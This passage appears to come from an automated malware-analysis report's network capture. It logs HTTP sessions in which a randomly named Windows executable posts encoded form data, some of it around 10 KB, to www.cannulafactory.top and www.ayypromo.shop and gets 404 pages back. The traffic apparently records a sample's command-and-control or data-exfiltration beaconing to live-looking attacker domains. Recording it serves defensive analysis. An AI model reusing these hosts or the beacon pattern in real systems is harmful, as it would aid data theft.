                                      Aug 26, 2024 18:29:15.767441034 CEST | 436 | IN | Data Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                                      Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      27 | 192.168.2.4 | 49765 | 18.183.3.45 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:29:17.381459951 CEST | 10865 | OUT | POST /l90v/ HTTP/1.1
                                      Host: www.cannulafactory.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.cannulafactory.top
                                      Referer: http://www.cannulafactory.top/l90v/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 56 46 45 72 76 44 71 5a 70 66 57 65 37 34 69 46 30 65 41 55 70 4b 4c 6a 56 77 4f 58 5a 52 54 50 75 4a 6b 4b 6a 72 33 70 34 62 5a 46 42 6d 63 37 2f 69 51 52 70 69 6e 2f 77 53 52 6d 75 74 63 61 4f 70 77 41 52 4e 53 43 76 55 77 76 41 57 6c 51 6a 77 74 4a 6f 63 51 30 51 54 5a 6b 30 2f 33 7a 50 49 7a 39 37 71 76 49 43 30 38 7a 4d 67 44 71 49 6d 39 6d 6b 50 4d 32 68 31 64 4b 34 78 6e 6b 32 43 34 39 2f 39 6e 63 30 33 44 71 6b 66 2b 50 31 45 4c 4f 64 75 71 46 7a 4e 35 67 72 78 46 53 32 5a 50 65 79 35 38 6c 73 2f 69 66 43 2f 30 70 49 64 31 75 51 36 6e 7a 6e 4a 32 75 4f 35 51 45 48 51 33 78 63 49 48 6d 62 46 71 45 6a 4a 78 48 57 67 42 70 4f 6b 65 54 42 57 49 66 35 35 5a 47 71 70 73 53 37 6e 31 31 36 63 59 37 6e 57 72 6d 55 5a 79 32 73 53 42 68 54 78 4b 45 38 46 79 41 74 72 44 31 6d 6f 4f 76 36 6c 77 6c 4f 52 54 4b 36 33 63 4f 6e 4c 69 6d 2f 41 36 4e 38 30 45 58 6b 63 56 4c [TRUNCATED]
                                      Data Ascii: 3L9l=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYVFErvDqZpfWe74iF0eAUpKLjVwOXZRTPuJkKjr3p4bZFBmc7/iQRpin/wSRmutcaOpwARNSCvUwvAWlQjwtJocQ0QTZk0/3zPIz97qvIC08zMgDqIm9mkPM2h1dK4xnk2C49/9nc03Dqkf+P1ELOduqFzN5grxFS2ZPey58ls/ifC/0pId1uQ6nznJ2uO5QEHQ3xcIHmbFqEjJxHWgBpOkeTBWIf55ZGqpsS7n116cY7nWrmUZy2sSBhTxKE8FyAtrD1moOv6lwlORTK63cOnLim/A6N80EXkcVLnIoci64tlyqZHnkeIdWiHox20C99XgZPlZYNmgWMPpAVfbkS0lsOHIltWAZfAJmhcXVkmW1zUPHxkA5eqn/5drzxFYy/iKAXkjZk3tTt1mFBORQTEs9m3/qcAYbcrij0Ct8vhfAJK/TRKYPiYgMLqHh3nqGAaX6+It7tQE7ztiBawXSg9EaXrlSh5f2NTYxzXMVTayT1VCuCCFSzM0hnxeU3/Qf+e2NFlltfE39LJW0jUW61/Y+PqyI2tNbyp6FjLjnT4gW+R+RlVicDl5AhxrTZGWCknwEC87pIZPUlX/YhatiTh6fVISFPEVJlPf5tQJCqwCau0rhW+tm3N5fxra1aSbavAALRa1omjf7IwAWscM0eFvOZMpBfLP/w+HY4gdLO5ekcSaoA2ysfLC5CfUaFND+0yHritGyVb52gHodiWHym286j+05o8hcT1CQNWKHcBR0v/OFfdyc6c7codfsPHwuRCFY20gzbRpuqfC3BqxRr5fsBupUgqcNi8ktpcFW12yxA26NaQzM+nuLm1sD5J6ZltCxumgxuIyMQ3it3+e9Wt6GoA0YhXDgkRzxj36sLFzn0t/hSrejnjDg3HLRYet0xTAfE4rzQUBkeq8FP58t02w+AOcJYxDzVdbVVznEdaL+NBSDniIyTjOsWsv1KxEiIhgPz5w [TRUNCATED]
                                      Aug 26, 2024 18:29:18.300373077 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 26 Aug 2024 16:29:18 GMT
                                      Content-Type: text/html
                                      Content-Length: 3971
                                      Connection: close
                                      ETag: "6526681e-f83"
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                      Aug 26, 2024 18:29:18.300389051 CEST | 224 | IN | Data Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; ba
                                      Aug 26, 2024 18:29:18.300399065 CEST | 1236 | IN | Data Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68
                                      Data Ascii: ckground-color: #900; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #000; }
                                      Aug 26, 2024 18:29:18.300410032 CEST | 224 | IN | Data Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e 67 20 77 65 62 70 61 67 65
                                      Data Ascii: iv class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed wi
                                      Aug 26, 2024 18:29:18.539123058 CEST | 1224 | IN | Data Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      28 | 192.168.2.4 | 49766 | 18.183.3.45 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:29:19.924750090 CEST | 488 | OUT | GET /l90v/?3L9l=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.cannulafactory.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:29:20.825329065 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 26 Aug 2024 16:29:20 GMT
                                      Content-Type: text/html
                                      Content-Length: 3971
                                      Connection: close
                                      ETag: "6526681e-f83"
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                      Aug 26, 2024 18:29:20.825344086 CEST | 224 | IN | Data Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; ba
                                      Aug 26, 2024 18:29:20.825354099 CEST | 1236 | IN | Data Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68
                                      Data Ascii: ckground-color: #900; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #000; }
                                      Aug 26, 2024 18:29:20.825366020 CEST | 224 | IN | Data Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e 67 20 77 65 62 70 61 67 65
                                      Data Ascii: iv class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed wi
                                      Aug 26, 2024 18:29:20.825375080 CEST | 1224 | IN | Data Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      29 | 192.168.2.4 | 49767 | 176.57.64.102 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Aug 26, 2024 18:29:34.033292055 CEST | 748 | OUT | POST /rgqx/ HTTP/1.1
                                      Host: www.ayypromo.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.ayypromo.shop
                                      Referer: http://www.ayypromo.shop/rgqx/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 6a 52 58 4d 4d 56 49 39 33 39 70 34 4b 65 46 63 2f 6d 65 6d 78 64 4c 6a 64 36 41 44 4f 6c 2b 69 70 70 52 45 41 4f 59 51 4e 5a 4f 50 76 36 62 54 33 53 75 66 39 6a 36 6e 38 56 6f 74 67 7a 2b 4f 79 7a 54 33 79 6d 4a 4f 74 61 72 56 65 62 54 30 6d 47 62 63 74 42 6e 7a 6a 36 68 76 4a 6f 47 49 2f 6f 65 67 45 73 4d 35 65 37 63 68 57 42 75 2b 37 4a 30 57 68 47 4e 70 46 54 67 48 55 49 6d 39 62 51 70 4e 54 6e 58 6f 42 71 6b 66 69 36 33 77 66 4c 51 41 33 58 52 38 65 6c 49 30 49 6f 35 58 6b 4f 39 42 69 36 51 54 32 50 6c 45 57 64 4d 59 33 36 76 4a 36 77 3d 3d
                                      Data Ascii: 3L9l=p58IGnZR0XdFjRXMMVI939p4KeFc/memxdLjd6ADOl+ippREAOYQNZOPv6bT3Suf9j6n8Votgz+OyzT3ymJOtarVebT0mGbctBnzj6hvJoGI/oegEsM5e7chWBu+7J0WhGNpFTgHUIm9bQpNTnXoBqkfi63wfLQA3XR8elI0Io5XkO9Bi6QT2PlEWdMY36vJ6w==
Aug 26, 2024 18:29:34.702248096 CEST | 749 | IN | HTTP/1.1 404 Not Found
                                      Server: ddos-guard
                                      Connection: close
                                      Set-Cookie: __ddg1_=gIrdR1B1Q86dlX2I5Y9n; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:34 GMT
                                      Date: Mon, 26 Aug 2024 16:29:34 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 340
                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                      ETag: "154-56d5bbe607fc0"
                                      Accept-Ranges: bytes
                                      X-Frame-Options: SAMEORIGIN
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49768 | 176.57.64.102 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
Timestamp | Bytes transferred | Direction | Data
Aug 26, 2024 18:29:36.587841034 CEST | 768 | OUT | POST /rgqx/ HTTP/1.1
                                      Host: www.ayypromo.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.ayypromo.shop
                                      Referer: http://www.ayypromo.shop/rgqx/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 4b 69 70 4c 35 45 42 4d 77 51 4b 5a 4f 50 68 61 62 57 35 79 75 45 39 69 47 5a 38 55 55 74 67 31 53 4f 79 79 50 33 78 55 68 42 73 4b 72 58 52 37 54 32 37 32 62 63 74 42 6e 7a 6a 36 31 46 4a 73 71 49 2f 5a 75 67 57 39 4d 32 43 4c 63 2b 54 78 75 2b 70 35 30 53 68 47 4d 4d 46 54 51 68 55 4f 69 39 62 52 5a 4e 51 31 76 76 57 61 6b 47 6d 36 32 46 50 62 6c 45 32 6d 70 77 65 6c 41 6e 57 4b 4a 73 6f 6f 73 62 7a 4c 78 45 6b 50 42 33 4c 61 46 73 36 35 53 41 68 36 7a 64 31 44 39 4e 32 2f 73 4e 47 54 46 68 48 69 69 74 4b 66 55 3d
                                      Data Ascii: 3L9l=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXKipL5EBMwQKZOPhabW5yuE9iGZ8UUtg1SOyyP3xUhBsKrXR7T272bctBnzj61FJsqI/ZugW9M2CLc+Txu+p50ShGMMFTQhUOi9bRZNQ1vvWakGm62FPblE2mpwelAnWKJsoosbzLxEkPB3LaFs65SAh6zd1D9N2/sNGTFhHiitKfU=
Aug 26, 2024 18:29:37.448333979 CEST | 749 | IN | HTTP/1.1 404 Not Found
                                      Server: ddos-guard
                                      Connection: close
                                      Set-Cookie: __ddg1_=qcu0yVM64DDVZF4bCVJ1; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:37 GMT
                                      Date: Mon, 26 Aug 2024 16:29:37 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 340
                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                      ETag: "154-56d5bbe607fc0"
                                      Accept-Ranges: bytes
                                      X-Frame-Options: SAMEORIGIN
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49769 | 176.57.64.102 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
Timestamp | Bytes transferred | Direction | Data
Aug 26, 2024 18:29:39.131866932 CEST | 10850 | OUT | POST /rgqx/ HTTP/1.1
                                      Host: www.ayypromo.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.ayypromo.shop
                                      Referer: http://www.ayypromo.shop/rgqx/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 53 69 70 34 42 45 41 72 45 51 4c 5a 4f 50 2f 4b 62 58 35 79 76 55 39 69 65 46 38 55 59 62 67 77 4f 4f 78 51 72 33 30 67 31 42 31 61 72 58 4a 4c 54 31 6d 47 62 4e 74 42 33 33 6a 36 6c 46 4a 73 71 49 2f 61 6d 67 56 73 4d 32 41 4c 63 68 57 42 75 4d 37 4a 30 36 68 47 55 32 46 58 4d 58 55 2b 43 39 62 78 4a 4e 53 41 37 76 55 36 6b 45 68 36 32 64 50 62 35 4c 32 6d 30 44 65 6b 45 4a 57 4a 56 73 2b 4d 70 71 6e 62 4e 77 32 50 63 76 58 72 35 2f 38 35 33 44 68 59 66 42 37 78 4e 6b 6a 39 6f 48 48 6a 45 6c 43 77 65 48 59 6f 2b 4d 45 2b 78 4d 68 6d 78 61 52 36 33 4d 4a 33 36 6b 55 71 68 74 38 30 67 52 76 73 78 41 45 49 43 67 48 45 6d 43 4a 74 37 64 30 37 36 62 70 56 55 78 75 6c 42 58 54 66 72 74 34 48 2b 48 43 79 70 55 54 43 71 42 69 58 38 50 68 55 67 68 4b 39 4f 31 4b 47 53 50 72 6b 46 68 6f 66 39 30 5a 5a 66 6d 39 4c 53 32 4a 78 59 68 61 66 74 55 38 67 43 4d 6a 49 72 33 39 [TRUNCATED]
Data Ascii: 3L9l= [TRUNCATED]
Aug 26, 2024 18:29:39.827151060 CEST | 749 | IN | HTTP/1.1 404 Not Found
                                      Server: ddos-guard
                                      Connection: close
                                      Set-Cookie: __ddg1_=fVu3sRgjivEndIImLJFH; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:39 GMT
                                      Date: Mon, 26 Aug 2024 16:29:39 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 340
                                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                      ETag: "154-56d5bbe607fc0"
                                      Accept-Ranges: bytes
                                      X-Frame-Options: SAMEORIGIN
